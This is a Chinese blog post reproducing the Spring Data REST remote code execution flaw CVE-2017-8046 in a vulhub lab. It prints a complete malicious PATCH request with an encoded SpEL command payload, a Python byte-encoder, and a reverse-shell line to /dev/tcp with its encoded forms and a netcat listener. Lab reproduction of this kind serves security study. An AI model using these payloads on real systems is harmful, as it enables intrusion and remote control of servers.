Spring Data Rest 远程命令执行漏洞复现(CVE-2017-8046)

最新推荐文章于 2024-05-31 19:04:00 发布
最新推荐文章于 2024-05-31 19:04:00 发布
阅读量3.1k 收藏 3
点赞数 1
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_38844729/article/details/107149916
版权

漏洞分析

漏洞原理: Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码
影响版本:
Spring Data REST versions < 2.5.12, 2.6.7, 3.0 RC3
Spring Boot version < 2.0.0M4
Spring Data release trains < Kay-RC3

漏洞复现

1、启动环境

cd vulhub-master/spring/CVE-2017-8046/
docker-compose up -d

2、命令执行
访问http://your-ip:8080/customers/1,然后抓取数据包,使用PATCH请求来修改

PATCH /customers/1 HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 202

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]

其中new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}表示的命令touch /tmp/success
这是将每个字符转为对应的十进制,可以通过下面的python代码进行转换:

payload = b'touch /tmp/success'
bytecode = ','.join(str(i) for i in list(payload))
print(bytecode)

成功发送数据包之后,可以进入docker容器内查看是否执行命令
进入docker容器:

docker ps  
docker exec -it [CONTAINER ID] /bin/bash

可以看到/tmp/目录中成功创建success
在这里插入图片描述
3、反弹shell
命令:bash -i >& /dev/tcp/10.10.10.10/7777 0>&1
base64编码bash -c {echo,YGJhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTAuMTAvNzc3NyAwPiYxYA==}|{base64,-d}|{bash,-i}
进制转换:

98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,71,74,104,99,50,103,103,76,87,107,103,80,105,89,103,76,50,82,108,100,105,57,48,89,51,65,118,77,84,65,117,77,84,65,117,77,84,65,117,77,84,65,118,78,122,99,51,78,121,65,119,80,105,89,120,89,65,61,61,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125

10.10.10.10上开启监听:nc -lvp 7777
替换掉touch /tmp/success对应的payload,重新发送数据包
成功反弹shell
在这里插入图片描述

漏洞修复

官方已经发布新版本修复了该漏洞,受影响的用户可升级至最新版本来防护该漏洞

参考文章

CVE-2017-8046漏洞分析
http://blog.nsfocus.net/spring-data-rest-server-patch-requests-remote-code-perform-vulnerability-analysis/

Franchi小白帽
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
apache stucts 2远程命令执行漏洞 (CVE-2021-31805) poc检测工具
04-21
检测一个url命令为 python3 CVE-2022-22954-POC.py -u http://test.com 检测多个url命令为 python3 CVE-2022-22954-POC.py -f file.txt(把url按一行一个保存到file.txt中) 结果有可能如下
CVE-2017-8046 Spring Data Rest 远程命令执行漏洞复现(最详细版本)
精品博客,你值得一看~
09-17 658
REST API的Patch方法中(实现RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码.先cd到spring目录下的CVE-2017-8046里面,然后使用docker-compose启动环境.一切都准备好之后就可以启动CVE-2017-8046 的环境了.
CVE-2017-8046-Spring Data Rest RCE 漏洞复现
m0_58596609的博客
04-22 1124
CVE-2017-8046-Spring Data Rest RCE 漏洞复现
spring远程命令执行漏洞复现CVE-2017-8046
最新发布
2301_82197189的博客
05-31 232
Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码。
漏洞复现 | CVE-2017-8046 Spring Data Rest 远程命令执行
weixin_42282189的博客
09-13 719
作者: 墨阳 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码 影响范围: Spring Data REST versions < 2.5.12, 2.6.7, 3.0 RC3 Spring Boot version < 2.0.0M4 Spring Data r.
CVE-2017-8046Spring Data Rest RCE)
weixin_30763455的博客
04-10 213
环境搭建参考第一个链接,springboot启动文件如下,不同的启类,将Application.class修改一下就可以了,直接debug。注意:默认版本是2.0.3版本,修改成低版本,看一下mvn下载的jar包版本 漏洞利用: 第一次请求: 第二次请求: 注意的点: 需要用PATCH方法,而且请求格式为JSON。根据RFC 6902,发送JSON文档结构需要注意以下两点: 1、请...
Spring Data Rest-远程命令执行漏洞CVE-2017-8046
qq_43381463的博客
04-11 453
Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中,path的值被传入`setValue`,导致执行了SpEL表达式,触发远程命令执行漏洞
漏洞复现----41、Spring Data Rest 远程命令执行漏洞CVE-2017-8046
七天
06-30 1094
Spring Data Rest 远程命令执行漏洞CVE-2017-8046
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
10-27
在2022年,Spring Framework 发现了一个严重的远程命令执行(RCE)漏洞,被称为CVE-2022-22965,也被称为“Spring4Shell”。这个漏洞对使用Spring Framework的应用程序构成了重大威胁,因为攻击者可以利用它来执行...
Spring Data Rest远程命令执行漏洞复现CVE-2017-8046
wutiangui的博客
09-10 394
Spring Data Rest服务器在处理PATCH请求时存在一个远程代码执行漏洞。攻击者通过构造好的JSON数据来执行任意Java代码。将Content-Type指定为application/json-patch+json。使用python将准备执行的代码编码为十进制。访问以下链接,出现如下界面说明存在漏洞。1.准备shell命令。修改方法改为PATCH。
Spring Data REST 远程代码执行漏洞CVE-2017-8046)分析与复现
美团技术团队
09-29 4843
前言 2009年9月Spring 3.0 RC1发布后,Spring就引入了SpEL(Spring Expression Language)。对于开发者而言,引入新的工具显然是令人兴奋的,但是对于运维人员,也许是噩耗的开始。类比Struts 2框架,会发现绝大部分的安全漏洞都和ognl脱不了干系。尤其是远程命令执行漏洞,占据了多少甲方乙方工程师的夜晚/周末,这导致Struts 2越...
SpringBoot-Eureka-xstream-rce漏洞复现
tpaer的博客
11-25 8524
关于SpringBoot-Eureka-xstream-rce漏洞复现的一次实战。
Spring Data Rest 远程命令执行漏洞 CVE-2017-8046 漏洞复现
ADummy的博客
03-02 229
Spring Data Rest 远程命令执行漏洞CVE-2017-8046) by ADummy 0x00利用路线 ​ burpuite抓包—>改包—>SpEL命令执行 0x01漏洞介绍 ​ Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中(实现RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞。 ​ 影响版本 Spr
Spring Data Rest 远程命令执行漏洞CVE-2017-8046
EC_Carrot的博客
08-03 471
漏洞简介 Spring Data是一个为数据访问提供基于Spring模型的项目。 Pivotal Spring Data RESTSpring Boot和Spring Data中存在安全漏洞。攻击者可通过发送恶意的PATCH请求利用该漏洞执行任意的Java代码。 影响版本 Pivotal Spring Data REST 2.5.12之前的版本,2.6.7之前的版本,3.0 RC3之前的版本 Spring Boot 2.0.0M4之前版本Spring Data Kay-RC3之前的版本 漏洞复现 访问h
Spring框架远程命令执行漏洞复现
xiaoMiao的博客
04-11 7135
Spring框架远程命令执行漏洞docker环境复现 记录篇~
spring漏洞复现cve-2022-22947,cve-2022-22963,cve-2022-22965)
qq_57939909的博客
08-30 1312
spring漏洞复现

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值